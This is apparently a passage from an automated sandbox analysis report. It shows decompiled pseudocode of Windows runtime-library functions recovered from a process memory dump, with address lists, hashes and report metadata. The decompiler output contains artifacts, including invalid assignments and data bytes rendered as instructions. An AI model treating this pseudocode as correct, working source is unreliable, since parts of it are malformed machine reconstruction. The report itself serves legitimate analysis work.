											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t297 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x4b37b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L04A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E04A5EB70(__ecx, 0x4b379a0);
										__eax = _v52;
										L36:
										_pop(_t329);
										_pop(_t337);
										__eflags = _v8 ^ _t340;
										_pop(_t288);
										return E04A8B640(_t216, _t288, _v8 ^ _t340, _t317, _t329, _t337);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t283 = _v56;
								if(_v56 != 0) {
									_t317 =  &_v36;
									_t285 = E04A72E3E(_t283,  &_v36);
									_t297 = _v36;
									_v76 = _t285;
								}
								if(_t297 == 0) {
									goto L44;
								} else {
									_t287 = _t287 + 2 + _t297;
								}
								goto L14;
							case 6:
								__eax =  *0x4b35764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x4b38478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4b38478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x4b36e58 & 0x0000ffff;
								__eax = ( *0x4b36e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t328 = _t328 + 1;
								if(_t328 >= _v48) {
									goto L16;
								} else {
									_t317 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("cmpsd");
					_t242 = _t241 + 0x66;
					 *((intOrPtr*)(_t330 - 0x58d81ffc)) =  *((intOrPtr*)(_t330 - 0x58d81ffc)) - _t242;
					asm("es cmpsd");
					_t244 = _t242 + 0x74;
					 *((intOrPtr*)(_t330 - 0x58d9fafc)) =  *((intOrPtr*)(_t330 - 0x58d9fafc)) - _t244;
					asm("stosd");
					_t246 = _t244 + 0xb3;
					 *((intOrPtr*)(_t330 - 0x54a4cafc)) =  *((intOrPtr*)(_t330 - 0x54a4cafc)) - _t246;
					 *((intOrPtr*)(_t330 - 0x58d77ffc)) =  *((intOrPtr*)(_t330 - 0x58d77ffc)) - _t343;
					asm("daa");
					asm("cmpsd");
					_t249 = _t246 + 0x116;
					 *((intOrPtr*)(_t330 - 0x58d7b1fc)) =  *((intOrPtr*)(_t330 - 0x58d7b1fc)) - _t249;
					asm("daa");
					asm("cmpsd");
					_t293 = 0x25;
					asm("stosd");
					 *((intOrPtr*)(_t330 - 0x54a3cbfc)) =  *((intOrPtr*)(_t330 - 0x54a3cbfc)) - _t249 + 0x1e9;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x4b1ff00);
					E04A9D08C(_t293, _t330, _t335);
					_v44 =  *[fs:0x18];
					_t331 = 0;
					 *_a24 = 0;
					_t294 = _a12;
					__eflags = _t294;
					if(_t294 == 0) {
						_t256 = 0xc0000100;
					} else {
						_v8 = 0;
						_t338 = 0xc0000100;
						_v52 = 0xc0000100;
						_t258 = 4;
						while(1) {
							_v40 = _t258;
							__eflags = _t258;
							if(_t258 == 0) {
								break;
							}
							_t307 = _t258 * 0xc;
							_v48 = _t307;
							__eflags = _t294 -  *((intOrPtr*)(_t307 + 0x4a21664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t273 = E04A8E5C0(_a8,  *((intOrPtr*)(_t307 + 0x4a21668)), _t294);
									_t343 = _t343 + 0xc;
									__eflags = _t273;
									if(__eflags == 0) {
										_t338 = E04AC51BE(_t294,  *((intOrPtr*)(_v48 + 0x4a2166c)), _a16, _t331, _t338, __eflags, _a20, _a24);
										_v52 = _t338;
										break;
									} else {
										_t258 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t258 = _t258 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t338;
						__eflags = _t338;
						if(_t338 < 0) {
							__eflags = _t338 - 0xc0000100;
							if(_t338 == 0xc0000100) {
								_t303 = _a4;
								__eflags = _t303;
								if(_t303 != 0) {
									_v36 = _t303;
									__eflags =  *_t303 - _t331;
									if( *_t303 == _t331) {
										_t338 = 0xc0000100;
										goto L76;
									} else {
										_t319 =  *((intOrPtr*)(_v44 + 0x30));
										_t260 =  *((intOrPtr*)(_t319 + 0x10));
										__eflags =  *((intOrPtr*)(_t260 + 0x48)) - _t303;
										if( *((intOrPtr*)(_t260 + 0x48)) == _t303) {
											__eflags =  *(_t319 + 0x1c);
											if( *(_t319 + 0x1c) == 0) {
												L106:
												_t338 = E04A72AE4( &_v36, _a8, _t294, _a16, _a20, _a24);
												_v32 = _t338;
												__eflags = _t338 - 0xc0000100;
												if(_t338 != 0xc0000100) {
													goto L69;
												} else {
													_t331 = 1;
													_t303 = _v36;
													goto L75;
												}
											} else {
												_t263 = E04A56600( *(_t319 + 0x1c));
												__eflags = _t263;
												if(_t263 != 0) {
													goto L106;
												} else {
													_t303 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t338 = E04A72C50(_t303, _a8, _t294, _a16, _a20, _a24, _t331);
											L76:
											_v32 = _t338;
											goto L69;
										}
									}
									goto L108;
								} else {
									E04A5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t338 = _a24;
									_t270 = E04A72AE4( &_v36, _a8, _t294, _a16, _a20, _t338);
									_v32 = _t270;
									__eflags = _t270 - 0xc0000100;
									if(_t270 == 0xc0000100) {
										_v32 = E04A72C50(_v36, _a8, _t294, _a16, _a20, _t338, 1);
									}
									_v8 = _t331;
									E04A72ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t256 = _t338;
					}
					L70:
					return E04A9D0D1(_t256);
				}
				L108:
			}

0x04a72584
0x04a72586
0x04a72590
0x04a72596
0x04a72597
0x04a72598
0x04a72599
0x04a7259e
0x04a725a4
0x04a725a9
0x04a725ac
0x04a725ae
0x04a725b1
0x04a725b2
0x04a725b5
0x04a725b8
0x04a725bb
0x04a725bc
0x04a725bf
0x04a725c2
0x04a725c5
0x04a725c6
0x04a725cb
0x04a725ce
0x04a725d8
0x04a725db
0x04a725dd
0x04a725de
0x04a725e1
0x04a725e3
0x04a725e9
0x04a726da
0x04a726da
0x04a726dd
0x04a726e2
0x04ab5b56
0x00000000
0x04a726e8
0x04a726f9
0x04a726fb
0x04a726fe
0x04a72700
0x04ab5b60
0x00000000
0x04a72706
0x04a72706
0x04a7270a
0x04a7270a
0x04a7270d
0x04a72713
0x04a72716
0x04a72718
0x04a7271c
0x04a7271e
0x04ab5b6c
0x04ab5b6f
0x04ab5b7f
0x04ab5b89
0x04ab5b8e
0x04ab5b93
0x04ab5b96
0x04ab5b9c
0x04ab5ba0
0x04ab5ba3
0x04ab5bab
0x04ab5bb0
0x04ab5bb3
0x04ab5bb3
0x04ab5ba3
0x04a72724
0x04a72726
0x04a72729
0x04a7272c
0x04a7279d
0x04a7279d
0x04a727a0
0x04a727a2
0x00000000
0x04a7272e
0x04a7272e
0x04a72731
0x04a72734
0x04a72734
0x04a72736
0x04ab5bc1
0x04ab5bc1
0x04ab5bc4
0x00000000
0x04ab5bca
0x04ab5bca
0x04ab5bcd
0x00000000
0x04ab5bd3
0x00000000
0x04ab5bd3
0x04ab5bcd
0x04a7273c
0x04a7273c
0x04a72742
0x04a72747
0x04a7274a
0x04a7274d
0x04a72750
0x00000000
0x04a72756
0x04a72756
0x00000000
0x04a72902
0x04a72908
0x04a7290b
0x00000000
0x04a72911
0x04a7291c
0x04a72921
0x00000000
0x04a72921
0x00000000
0x00000000
0x04a72880
0x04a72887
0x04a7288c
0x00000000
0x00000000
0x04a72805
0x04a7280a
0x04a72814
0x04a72816
0x00000000
0x00000000
0x04a7281e
0x04a72821
0x04a72823
0x00000000
0x04a72829
0x04a72829
0x04a72831
0x04a7283c
0x04a7283e
0x00000000
0x04a7283e
0x00000000
0x00000000
0x04a7284e
0x04a72850
0x04a72851
0x04a72854
0x04a72857
0x04a7285a
0x04a7285c
0x04a7285d
0x00000000
0x00000000
0x04a7275d
0x04a72761
0x00000000
0x04a72767
0x04a7276e
0x04a72773
0x04a72773
0x04a72776
0x04a72778
0x04a7277e
0x04a7277e
0x04a72781
0x04a72781
0x04a72783
0x04a72784
0x00000000
0x00000000
0x04ab5bd8
0x04ab5bde
0x04ab5be4
0x04ab5be6
0x04ab5be8
0x04ab5be9
0x04ab5bee
0x04ab5bf8
0x04ab5bff
0x04ab5c01
0x04ab5c04
0x04ab5c07
0x04ab5c0b
0x04ab5c0d
0x04ab5c0d
0x04ab5c15
0x04ab5c18
0x04ab5c1b
0x04ab5c1b
0x04ab5c1e
0x00000000
0x00000000
0x04a728c3
0x04a728c8
0x04a728d2
0x04a728d4
0x04a728d8
0x04a728db
0x04ab5c26
0x04ab5c28
0x04ab5c2d
0x04ab5c2d
0x00000000
0x00000000
0x04ab5c34
0x04ab5c36
0x04ab5c49
0x04ab5c4e
0x04ab5c54
0x04ab5c5b
0x04ab5c5d
0x04ab5c60
0x04a72788
0x04a72788
0x04a7278b
0x04a7278e
0x04a7278e
0x04a7278e
0x04a72791
0x00000000
0x00000000
0x04a72756
0x04a72750
0x00000000
0x04a72794
0x04a72794
0x04a72795
0x04a72798
0x04a72798
0x00000000
0x04a72734
0x04a7272c
0x04a72700
0x04a725ef
0x04a725ef
0x04a725ef
0x04a725f2
0x04a725f8
0x00000000
0x00000000
0x04a725fe
0x00000000
0x04a728e6
0x04a728ec
0x04a728ef
0x04a728f5
0x04a728f8
0x04a728f8
0x00000000
0x04a728f8
0x00000000
0x00000000
0x04a72866
0x04a72866
0x04a72876
0x04a72879
0x00000000
0x00000000
0x04a727e0
0x04a727e7
0x04a727e9
0x04a727eb
0x04ab5afd
0x00000000
0x04ab5afd
0x00000000
0x00000000
0x04a72633
0x04a72638
0x04a7263b
0x04a7263c
0x04a7263e
0x04a72640
0x04a72642
0x04a72647
0x04a72649
0x04a7264e
0x04a72650
0x04a72653
0x04a72659
0x04a726a2
0x04a726a7
0x04a726ac
0x04a726b2
0x04ab5b11
0x04ab5b15
0x04ab5b17
0x00000000
0x04a726b8
0x04a726b8
0x04a726ba
0x04a727a6
0x04a727a6
0x04a727a9
0x04a727ab
0x04a727b9
0x04a727b9
0x04a727be
0x04a727c1
0x04a727c3
0x04a727c5
0x04a727c7
0x04ab5c74
0x04ab5c79
0x04ab5c79
0x04a727c7
0x00000000
0x04a726c0
0x04a726c0
0x04a726c3
0x04a726c6
0x04a726c6
0x04a726c9
0x04a726c9
0x00000000
0x04a726c9
0x04a726ba
0x04a7265b
0x04a7265b
0x04a7265e
0x04a72667
0x04a7266d
0x04a72677
0x04a7267c
0x04a7267f
0x04a72681
0x04ab5b49
0x04ab5b4e
0x04a727cd
0x04a727d0
0x04a727d1
0x04a727d2
0x04a727d4
0x04a727dd
0x04a72687
0x04a72687
0x04a7268a
0x04a7268b
0x04a7268e
0x04a7268f
0x04a72691
0x04a72696
0x04a72698
0x04a7269d
0x04a7269f
0x00000000
0x04a7269f
0x04a72681
0x00000000
0x00000000
0x04a72846
0x00000000
0x00000000
0x04a72605
0x04a7260a
0x04a7260c
0x04a72611
0x04a72616
0x04a72619
0x04a72619
0x04a7261e
0x00000000
0x04a72624
0x04a72627
0x04a72627
0x00000000
0x00000000
0x04ab5b1f
0x00000000
0x00000000
0x04a72894
0x04a7289b
0x04a7289d
0x04a728a1
0x04ab5b2b
0x04ab5b2e
0x04ab5b2e
0x04a728a7
0x04a728a9
0x04ab5b04
0x04ab5b09
0x04ab5b09
0x04ab5b09
0x00000000
0x00000000
0x04ab5b35
0x04ab5b3c
0x04a728fb
0x04a728fb
0x04a726cc
0x04a726cc
0x04a726d0
0x00000000
0x04a726d2
0x04a726d2
0x00000000
0x04a726d2
0x00000000
0x00000000
0x04a725fe
0x04a7292d
0x04a72930
0x04a72935
0x04a72937
0x04a72938
0x04a7293a
0x04a72942
0x04a72944
0x04a72946
0x04a7294f
0x04a72950
0x04a72952
0x04a7295a
0x04a72962
0x04a72963
0x04a72964
0x04a72966
0x04a7296e
0x04a7296f
0x04a72972
0x04a72973
0x04a72976
0x04a7297e
0x04a7297f
0x04a72980
0x04a72981
0x04a72982
0x04a72983
0x04a72984
0x04a72985
0x04a72986
0x04a72987
0x04a72988
0x04a72989
0x04a7298a
0x04a7298b
0x04a7298c
0x04a7298d
0x04a7298e
0x04a7298f
0x04a72990
0x04a72992
0x04a72997
0x04a729a3
0x04a729a6
0x04a729ab
0x04a729ad
0x04a729b0
0x04a729b2
0x04ab5c80
0x04a729b8
0x04a729b8
0x04a729bb
0x04a729c0
0x04a729c5
0x04a729c6
0x04a729c6
0x04a729c9
0x04a729cb
0x00000000
0x00000000
0x04a729cd
0x04a729d0
0x04a729d9
0x04a729db
0x04a729dd
0x04a72a7f
0x04a72a84
0x04a72a87
0x04a72a89
0x04ab5ca1
0x04ab5ca3
0x00000000
0x04a72a8f
0x04a72a8f
0x00000000
0x04a72a8f
0x00000000
0x04a729e3
0x04a729e3
0x04a729e3
0x00000000
0x04a729e3
0x04a729dd
0x00000000
0x04a729db
0x04a729e6
0x04a729e9
0x04a729eb
0x04a729ed
0x04a729f3
0x04a729f5
0x04a729f8
0x04a729fa
0x04a72a97
0x04a72a9a
0x04a72a9d
0x04a72add
0x00000000
0x04a72a9f
0x04a72aa2
0x04a72aa5
0x04a72aa8
0x04a72aab
0x04ab5cab
0x04ab5caf
0x04ab5cc5
0x04ab5cda
0x04ab5cdc
0x04ab5cdf
0x04ab5ce5
0x00000000
0x04ab5ceb
0x04ab5ced
0x04ab5cee
0x00000000
0x04ab5cee
0x04ab5cb1
0x04ab5cb4
0x04ab5cb9
0x04ab5cbb
0x00000000
0x04ab5cbd
0x04ab5cbd
0x00000000
0x04ab5cbd
0x04ab5cbb
0x04a72ab1
0x04a72ab1
0x04a72ac4
0x04a72ac6
0x04a72ac6
0x00000000
0x04a72ac6
0x04a72aab
0x00000000
0x04a72a00
0x04a72a09
0x04a72a0e
0x04a72a21
0x04a72a24
0x04a72a35
0x04a72a3a
0x04a72a3d
0x04a72a42
0x04a72a59
0x04a72a59
0x04a72a5c
0x04a72a5f
0x04a72a5f
0x04a729fa
0x04a729f3
0x04a72a64
0x04a72a64
0x04a72a6b
0x04a72a6b
0x04a72a6d
0x04a72a72
0x04a72a72
0x00000000

Strings

PATH, xrefs: 04A72642, 04A72691

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 360f1360e2d6d839d62dd9d0ee202f123910d2ee8f720d922e9d4d14dd7b5704
Instruction ID: 82cec4373a084cc5e0ab4f59598043a3c25e29c82822222fdab592b680b68108
Opcode Fuzzy Hash: 360f1360e2d6d839d62dd9d0ee202f123910d2ee8f720d922e9d4d14dd7b5704
Instruction Fuzzy Hash: 02C16FB6E10219EFDB25DF99DD81BAEB7B5FF48704F04406AE841AB250E734B941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A7FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04A7FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E04A5EEF0(0x4b37b60);
					_t134 =  *0x4b37b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4b37b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4b37b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04A56D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E04A576E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04AE8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E04A4B150();
													}
													_t116 = E04AE6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E04A575CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4b38638; // 0xdcfd40
																	_t122 = L04A538A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E04A576E2(_t154);
																			goto L41;
																		}
																	} else {
																		E04A576E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L04A7FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L04A570F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E04A7FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E04A7FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E04A7FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E04A7FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E04A7FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4b37b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4b37b84 = _t75;
						_t73 = E04A5EB70(_t134, 0x4b37b60);
						if( *0x4b37b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E04A5FF60( *0x4b37b20);
							}
						}
						goto L5;
					}
				}
			}

0x04a7fab0
0x04a7fab2
0x04a7fab3
0x04a7fab4
0x04a7fabc
0x04a7fac0
0x04a7fb14
0x04a7fb17
0x04a7fac2
0x04a7fac8
0x04a7facd
0x04a7fad3
0x04a7fad3
0x04a7fadd
0x04a7fb18
0x04a7fb1b
0x04a7fb1d
0x04a7fb1e
0x04a7fb1f
0x04a7fb20
0x04a7fb21
0x04a7fb22
0x04a7fb23
0x04a7fb24
0x04a7fb25
0x04a7fb26
0x04a7fb27
0x04a7fb28
0x04a7fb29
0x04a7fb2a
0x04a7fb2b
0x04a7fb2c
0x04a7fb2d
0x04a7fb2e
0x04a7fb2f
0x04a7fb3a
0x04a7fb3b
0x04a7fb3e
0x04a7fb41
0x04a7fb44
0x04a7fb47
0x04a7fb4a
0x04a7fb4d
0x04a7fb53
0x04abbdcb
0x04abbdcb
0x04a7fb59
0x04a7fb5b
0x04a7fb5b
0x04a7fb5e
0x04abbdd5
0x04abbdd8
0x00000000
0x04abbdda
0x00000000
0x04abbdda
0x04a7fb64
0x04a7fb64
0x04a7fb64
0x04a7fb67
0x04a7fb6e
0x04a7fb70
0x04a7fb72
0x00000000
0x04a7fb78
0x04a7fb7a
0x04a7fb7a
0x04a7fb7d
0x04a7fb80
0x04abbddf
0x04abbde1
0x00000000
0x04abbde3
0x00000000
0x04abbde3
0x04a7fb86
0x04a7fb86
0x04a7fb86
0x04a7fb8b
0x04a7fb90
0x04a7fb92
0x04a7fb94
0x04a7fb9a
0x04a7fb9b
0x04a7fba1
0x04abbde8
0x04abbdeb
0x04abbded
0x04abbeb5
0x04abbeb5
0x04abbebb
0x04abbebd
0x04abbec3
0x04abbed2
0x04abbedd
0x04abbedd
0x04abbeed
0x00000000
0x04abbdf3
0x04abbdfe
0x04abbe06
0x04abbe0b
0x04abbe0d
0x04abbe0f
0x04abbe14
0x04abbe19
0x04abbe20
0x04abbe25
0x04abbe27
0x04abbe35
0x04abbe39
0x04abbe46
0x04abbe4f
0x04abbe54
0x04abbe56
0x04abbef8
0x04abbef8
0x00000000
0x04abbe5c
0x04abbe5c
0x04abbe60
0x00000000
0x04abbe66
0x04abbe66
0x04abbe7f
0x04abbe84
0x04abbe87
0x04abbe89
0x04abbe8b
0x04abbe99
0x04abbe9d
0x04abbea0
0x04abbeac
0x04abbeaf
0x04abbeb1
0x04abbeb3
0x04abbeb3
0x00000000
0x04abbea2
0x04abbea2
0x00000000
0x04abbea2
0x04abbe8d
0x04abbe8d
0x04abbe92
0x00000000
0x04abbe92
0x04abbe8b
0x04abbe60
0x04abbe3b
0x04abbe3b
0x04abbe3e
0x00000000
0x04abbe40
0x04abbe40
0x04abbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x04abbe44
0x04abbe3e
0x04abbe29
0x04abbe29
0x00000000
0x04abbe29
0x04abbe27
0x00000000
0x04a7fba7
0x04a7fba7
0x04a7fbab
0x04abbf02
0x04a7fbb1
0x04a7fbb1
0x04a7fbb8
0x04a7fbbd
0x04a7fbbd
0x04a7fbbf
0x04a7fbbf
0x04a7fbc5
0x04a7fbcb
0x04a7fbf8
0x04a7fbf8
0x04a7fbfa
0x00000000
0x04a7fc00
0x04a7fc00
0x04a7fc03
0x00000000
0x04a7fc09
0x04a7fc09
0x04a7fc0f
0x04a7fc15
0x04a7fc23
0x04a7fc23
0x04a7fc25
0x04a7fc27
0x04a7fc75
0x04a7fc7c
0x04a7fc84
0x00000000
0x04a7fc29
0x04a7fc29
0x04a7fc2d
0x04a7fc30
0x04abbf0f
0x00000000
0x04a7fc36
0x04a7fc38
0x04a7fc3b
0x04a7fc41
0x04abbf17
0x04abbf19
0x04abbf48
0x04abbf4b
0x00000000
0x04abbf1b
0x04abbf22
0x04abbf24
0x04abbf26
0x00000000
0x04abbf2c
0x04abbf37
0x04abbf39
0x04abbf3b
0x00000000
0x04abbf41
0x04abbf41
0x04abbf41
0x04abbf41
0x04abbf45
0x00000000
0x04abbf45
0x04abbf3b
0x04abbf26
0x00000000
0x04a7fc47
0x04a7fc47
0x04a7fc49
0x04a7fcb2
0x04a7fcb4
0x04a7fcb6
0x04a7fcdc
